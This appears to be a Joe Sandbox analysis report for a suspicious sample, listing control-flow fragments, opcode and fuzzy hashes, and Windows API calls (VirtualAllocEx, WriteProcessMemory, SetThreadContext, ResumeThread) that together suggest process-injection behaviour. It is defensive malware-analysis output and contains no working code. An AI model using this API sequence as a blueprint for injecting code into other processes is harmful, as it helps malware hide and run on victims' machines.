                                                      control_flow_graph 215 7167a99-7167a9a 216 7167aa2-7167aa5 215->216 217 7167a9c-7167a9e 215->217 218 7167aa6-7167aee 216->218 217->218 219 7167aa0-7167aa1 217->219 221 7167af0-7167afc 218->221 222 7167afe-7167b3d WriteProcessMemory 218->222 219->216 221->222 224 7167b46-7167b76 222->224 225 7167b3f-7167b45 222->225 225->224
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B30
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 825cdae6d20ee3ca95f85e0cf9bc6d5f29c20ca64d204c980cfcec776f41839c
                                                      • Instruction ID: 2ffba8989a8c9f17c8a799e25e022cd258cc6a7cff65bf820332926afa68717d
                                                      • Opcode Fuzzy Hash: 825cdae6d20ee3ca95f85e0cf9bc6d5f29c20ca64d204c980cfcec776f41839c
                                                      • Instruction Fuzzy Hash: B32159B19003099FCB10CFA9C984BEEBBF5BF48318F148429E918A7280D7789955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 7167b88-7167c1d ReadProcessMemory 234 7167c26-7167c56 229->234 235 7167c1f-7167c25 229->235 235->234
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: e4b4c746315d78efe38b6790555d2a06f76bbaedd4cb9ba49e6d53120bda0aa1
                                                      • Instruction ID: af40d10363fc8ac4adb10767691266da47f2541b64cda8d65b41ff391f5437ff
                                                      • Opcode Fuzzy Hash: e4b4c746315d78efe38b6790555d2a06f76bbaedd4cb9ba49e6d53120bda0aa1
                                                      • Instruction Fuzzy Hash: C92139B1C003199FCB10CFA9D984AEEBBF5FF48314F108829E529A7250D7389955CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 7167aa0-7167aee 243 7167af0-7167afc 239->243 244 7167afe-7167b3d WriteProcessMemory 239->244 243->244 246 7167b46-7167b76 244->246 247 7167b3f-7167b45 244->247 247->246
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B30
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 252793b0311a7489a8801560bd0675e6e1bc873589e64fdead95e7bca24cd91f
                                                      • Instruction ID: 39ba648c5c5293c60d29c813de49625a1ce6aa616bc29680f5a9fee6046ac5e7
                                                      • Opcode Fuzzy Hash: 252793b0311a7489a8801560bd0675e6e1bc873589e64fdead95e7bca24cd91f
                                                      • Instruction Fuzzy Hash: 9E2127B19003599FCF10CFA9C984BDEBBF5FF48318F148829E919A7290D7789954CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 257 7167900-7167905 258 716790e-7167953 257->258 259 7167908-716790d 257->259 261 7167955-7167961 258->261 262 7167963-7167993 SetThreadContext 258->262 259->258 261->262 264 7167995-716799b 262->264 265 716799c-71679cc 262->265 264->265
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 07167986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 204f42c6919a020494fd77dee97865abddee35a36ab2de5674c5eb51fdcde223
                                                      • Instruction ID: 636d92c7e3c5c71ead86f0425a6235be1ad253fd9346f65d36f906da24b27172
                                                      • Opcode Fuzzy Hash: 204f42c6919a020494fd77dee97865abddee35a36ab2de5674c5eb51fdcde223
                                                      • Instruction Fuzzy Hash: 6D2139B1D103098FDB10DFAAC5887EEBBF5AF48328F148429D459B7280DB789945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 251 2759790-275baac DuplicateHandle 253 275bab5-275bad2 251->253 254 275baae-275bab4 251->254 254->253
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275B9DE,?,?,?,?,?), ref: 0275BA9F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 98fa89c6b5c35a0abf094ee2b2693f1b58d0375efa2b667e6a28d90df8f38597
                                                      • Instruction ID: 937de418f51763fed2b0816c457200f8f1e700454ded314afafdb79d1255b098
                                                      • Opcode Fuzzy Hash: 98fa89c6b5c35a0abf094ee2b2693f1b58d0375efa2b667e6a28d90df8f38597
                                                      • Instruction Fuzzy Hash: B021E5B59002189FDB10CFA9D584AEEFBF8EB48314F14841AE915B7310D378A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 280 7167b90-7167c1d ReadProcessMemory 283 7167c26-7167c56 280->283 284 7167c1f-7167c25 280->284 284->283
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 150455ebbffd7faa2e971c9e838b494ea6639dae4e00a5da28ff75d024650762
                                                      • Instruction ID: c8e28c5fd78b45d1104d5db3b22b13d62ce78c02b8943ef4eebaf82b1ea3e959
                                                      • Opcode Fuzzy Hash: 150455ebbffd7faa2e971c9e838b494ea6639dae4e00a5da28ff75d024650762
                                                      • Instruction Fuzzy Hash: 8E2128B1D003199FCB10CFA9D984AEEBBF5FF48324F108829E529A7250D7789954CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 269 7167908-7167953 272 7167955-7167961 269->272 273 7167963-7167993 SetThreadContext 269->273 272->273 275 7167995-716799b 273->275 276 716799c-71679cc 273->276 275->276
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 07167986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: c25f84918bef6ccda4016113724a317b89ff6c7bf90d440f749b5afb4470c88d
                                                      • Instruction ID: 149b580a042dfb56aec3b67ebfe77f82044ef7cb2a419a6dbb84e6e0e56a3514
                                                      • Opcode Fuzzy Hash: c25f84918bef6ccda4016113724a317b89ff6c7bf90d440f749b5afb4470c88d
                                                      • Instruction Fuzzy Hash: 6A2138B1D003098FDB10CFAAC5847EEBBF4AF48328F148429D459A7280DB78A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 288 2759c50-2759c52 289 2759c54-2759c55 288->289 290 2759c56-2759c98 288->290 289->290 291 2759c34-2759c3e 289->291 292 2759ca0-2759ccf LoadLibraryExW 290->292 293 2759c9a-2759c9d 290->293 294 2759cd1-2759cd7 292->294 295 2759cd8-2759cf5 292->295 293->292 294->295
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02759AB1,00000800,00000000,00000000), ref: 02759CC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 38bf8552f842ffa2bf04d56b95f63161b256352d47eb2269161f0f84492ce1fb
                                                      • Instruction ID: 14c3eca93b2e5f3fafeaed7caeb99afa492c6d64fd5a102cfbb55aeab5c00812
                                                      • Opcode Fuzzy Hash: 38bf8552f842ffa2bf04d56b95f63161b256352d47eb2269161f0f84492ce1fb
                                                      • Instruction Fuzzy Hash: 722158B6900219CFDB10CFAAD544BDEFBF4EB88364F14842AD929A7600C7799545CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 299 275ba13-275baac DuplicateHandle 300 275bab5-275bad2 299->300 301 275baae-275bab4 299->301 301->300
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275B9DE,?,?,?,?,?), ref: 0275BA9F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 2030f09ba25f9e5f1e714b9d848227a8b0b44dd4b4bedbdba8805a1a3d6efe78
                                                      • Instruction ID: 3c11825495ba0f9f4e96750b717f132f25a91949f890560fee13bd22d5738f85
                                                      • Opcode Fuzzy Hash: 2030f09ba25f9e5f1e714b9d848227a8b0b44dd4b4bedbdba8805a1a3d6efe78
                                                      • Instruction Fuzzy Hash: A321E2B5900219DFDB00CFA9D584AEEBBF5FB48324F24841AE914A3210C778A944CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 71679d9-71679da 305 71679e2-71679e5 304->305 306 71679dc-71679dd 304->306 307 71679e6-7167a5b VirtualAllocEx 305->307 306->307 308 71679e0-71679e1 306->308 311 7167a64-7167a89 307->311 312 7167a5d-7167a63 307->312 308->305 312->311
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07167A4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2fccc3eab7179b45006b93c1fc7d405b93dec62868cb70092d6c78568100cac4
                                                      • Instruction ID: 4c6960315ea2a7445beb0ed53454c8517056fc8f3867bcde64bc0a12a9f66d33
                                                      • Opcode Fuzzy Hash: 2fccc3eab7179b45006b93c1fc7d405b93dec62868cb70092d6c78568100cac4
                                                      • Instruction Fuzzy Hash: 5D114A758002099FCB10CFA9D9487EFBBF5AF88318F148819E525A7250D7759A54CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: c48169b21bf198818422e8454d272878b0542b64ff30fe913c663ccd1aab7537
                                                      • Instruction ID: 043b0919f0d256a246406c1aaa6540c1f9f3a66737f006ee725c5feb6639d8b0
                                                      • Opcode Fuzzy Hash: c48169b21bf198818422e8454d272878b0542b64ff30fe913c663ccd1aab7537
                                                      • Instruction Fuzzy Hash: CC117CB1C002088BDB10CFA9C5497EFBBF8AB88718F208829D525A7240C7745905CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02759AB1,00000800,00000000,00000000), ref: 02759CC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: d46bddf5bf7e7e6f6ebe5ce89278e1ac92a2a5bed555caee0bdcf8cac0265b66
                                                      • Instruction ID: 2fe0fb7be52de78384fe3c298618fae9b8e6c7bfd1aa4101537e0f3e5026b3b3
                                                      • Opcode Fuzzy Hash: d46bddf5bf7e7e6f6ebe5ce89278e1ac92a2a5bed555caee0bdcf8cac0265b66
                                                      • Instruction Fuzzy Hash: 041114B6900258DFDB10CFAAD544ADEFBF4EB48314F14842AE925B7200C3B9A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07167A4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 75c44b3be28fe307b7f019cf3cd98555a86420d872e18618d3f896522d4a7d44
                                                      • Instruction ID: 74d9797a3cde712b55cb2eedbf902ea7d98b3d3e2ea045522b5c17b17b096ac8
                                                      • Opcode Fuzzy Hash: 75c44b3be28fe307b7f019cf3cd98555a86420d872e18618d3f896522d4a7d44
                                                      • Instruction Fuzzy Hash: 811137719002099FDF10CFA9D9487DFBBF9AF88328F148819E529A7250C7799A54CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0716A5FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 3ffb70b6d360d7284585029d7c1966534a571de52fa4f30a8ed7ec4c980f5e1d
                                                      • Instruction ID: 6c115eb1b494d15b83550d2def03c8ae93eccf9dfa10ec8a14aed2404b6560e2
                                                      • Opcode Fuzzy Hash: 3ffb70b6d360d7284585029d7c1966534a571de52fa4f30a8ed7ec4c980f5e1d
                                                      • Instruction Fuzzy Hash: E011E6B58003499FDB10CF99D989BDEBFF8EB48314F208419E515B7640D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 5daabb7bbb839389e6dcee2f57b073a5e554aa5b78072b230eb3ffab6aef59bd
                                                      • Instruction ID: a2175150a52b77d5b77f607ac9c215b53a3b0e5f79f6aaf1446edb26c04ea2bd
                                                      • Opcode Fuzzy Hash: 5daabb7bbb839389e6dcee2f57b073a5e554aa5b78072b230eb3ffab6aef59bd
                                                      • Instruction Fuzzy Hash: 22113DB1D003088BDB14DFA9D5497DFFBF9AF48318F148819D525A7240C778A944CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0716A5FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 94ab7cb5ffd88407fd5f87c6cc950b59963ed989ac62879dd642c65886d23faf
                                                      • Instruction ID: e3b45097f282c66a0431c0e6e4ad51e1c2bd6a79926e755b40325503294ee027
                                                      • Opcode Fuzzy Hash: 94ab7cb5ffd88407fd5f87c6cc950b59963ed989ac62879dd642c65886d23faf
                                                      • Instruction Fuzzy Hash: 2E1103B58003599FDB10CF99D988BDEBBF8EF49324F20841AE925B7240D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02759A36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 3b2098acc190833cead4adf8733780a9c49a87608d16ff9d10dff1d0afc3aa5a
                                                      • Instruction ID: 4857fd31db8e22d2d1faf83170dc4790b354e839dd267407e17b2f93cf55088b
                                                      • Opcode Fuzzy Hash: 3b2098acc190833cead4adf8733780a9c49a87608d16ff9d10dff1d0afc3aa5a
                                                      • Instruction Fuzzy Hash: B6110FB5C00619CFDB10CF9AC544BDEFBF4AB89224F14842AD829B7200C3B8A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8476daf6c2c0711be9ea98089846bf41ebf111badba67a5b4c13b43067c8c4a0
                                                      • Instruction ID: d6f89ee25807fa83605a4ee89aaba8a32c5893caf6456e610ccbb5c4febbdadb
                                                      • Opcode Fuzzy Hash: 8476daf6c2c0711be9ea98089846bf41ebf111badba67a5b4c13b43067c8c4a0
                                                      • Instruction Fuzzy Hash: 2F21D371604200AFDB05DF54E9C4B26BBA5FF98318F24CD69D9594B346C336D847CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 219767de7d12cc727a511c8cdc8d2f0d24e5a722205590e6a1c9d8b502f0c761
                                                      • Instruction ID: 0f2b34afb4bd9dacf5c6a160c9e2f254c1e1db69b82e15e87779e35d8565c71f
                                                      • Opcode Fuzzy Hash: 219767de7d12cc727a511c8cdc8d2f0d24e5a722205590e6a1c9d8b502f0c761
                                                      • Instruction Fuzzy Hash: FD21B075604280DFDB18DF64E9C4B26BBA5EF88318F24CD69D84A4B346C33AD847CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da76275fc50eddabd71bb2de71cf87f6d42327d7f708e88173e5a02a09a3b1c5
                                                      • Instruction ID: cc1a9e891383283f31ce28dc129ea723ea3ca36b5365b5b58400d724baa0acdc
                                                      • Opcode Fuzzy Hash: da76275fc50eddabd71bb2de71cf87f6d42327d7f708e88173e5a02a09a3b1c5
                                                      • Instruction Fuzzy Hash: 3E219F755093C08FCB02CF24D994B15BF71EF46214F28C6DAD8498B6A7C33A980ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345577175.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_267d000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da879ffd631527e5b9c737a315258a5b95fe24a274f4089d0abe0811ce168bab
                                                      • Instruction ID: 353835f09a52f1289893b603cadf7557881f7320c3b850709b9e45681afa5031
                                                      • Opcode Fuzzy Hash: da879ffd631527e5b9c737a315258a5b95fe24a274f4089d0abe0811ce168bab
                                                      • Instruction Fuzzy Hash: 3F117975504280DFCB11CF14D6C4B16BBA1FB84224F28CAA9D9494B756C33AD44ACB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =$UUUU
                                                      • API String ID: 0-1997415349
                                                      • Opcode ID: cb5281f700e9553c3dbea60ec887d01c43305b051988015eb56fe4eb7355d4b0
                                                      • Instruction ID: 2bc2c431ba5e10ad7effe5c021fc95759443b3bd9fa221dc0c6791afbfc179e3
                                                      • Opcode Fuzzy Hash: cb5281f700e9553c3dbea60ec887d01c43305b051988015eb56fe4eb7355d4b0
                                                      • Instruction Fuzzy Hash: 08514970E11628CFEBA4CB69C981B89B7F2BB48314F5482E9D45CE7205DB34AE85CF15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cca7abf98fb4274811f84f33e79c3c37eb4286b4a4b94e8bab0ebea16097462f
                                                      • Instruction ID: 35850cc14e3e357ae00991f6a94e4dfbdf804db004518991265f9acd746c42d9
                                                      • Opcode Fuzzy Hash: cca7abf98fb4274811f84f33e79c3c37eb4286b4a4b94e8bab0ebea16097462f
                                                      • Instruction Fuzzy Hash: 9CA14C32E0062A8FCF16DFA5C8445DEF7B3FF85304B15856AE805AB260EB71A955CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bed2a3426b538de98f16fe6ab901a1b857690611682ade48103440b1fb2e32f
                                                      • Instruction ID: d294655a28f0eed50b22c72f6697da69766b0354091884ac93f62d7830c486e9
                                                      • Opcode Fuzzy Hash: 1bed2a3426b538de98f16fe6ab901a1b857690611682ade48103440b1fb2e32f
                                                      • Instruction Fuzzy Hash: A75170B1E016598BEB68CF6B8C4478AFAF7AFC5304F14C1BA850CA7255DB304995CF15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b630aa8eefbaa5826f03b9e61cf3e12a2e5b3ec631795f859c13708d76fcdb7
                                                      • Instruction ID: 8420895609366664edd771efb41d0321d463dbe5b4d6c91d1b4ba1532bee770a
                                                      • Opcode Fuzzy Hash: 0b630aa8eefbaa5826f03b9e61cf3e12a2e5b3ec631795f859c13708d76fcdb7
                                                      • Instruction Fuzzy Hash: 255181B1E006598BEB68CF6B8C4478AFAF7AFC5200F14C1BAD50CA7254EB3049958F15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f873883fdda5b3409a15bf8ae0f97ad0a1335d0c3bff55d99e75a8ff68cfc4dd
                                                      • Instruction ID: 0d1e7943189d948d15496d4dff86abcc4e83875a87b2b0641e2a82a20183128a
                                                      • Opcode Fuzzy Hash: f873883fdda5b3409a15bf8ae0f97ad0a1335d0c3bff55d99e75a8ff68cfc4dd
                                                      • Instruction Fuzzy Hash: 1721BBB1D056198BEB28CF6B8C0479AFAF7BFC9300F05C1FAC40DA6295EB7459958E41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:8.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.1%
                                                      Total number of Nodes:1893
                                                      Total number of Limit Nodes:121
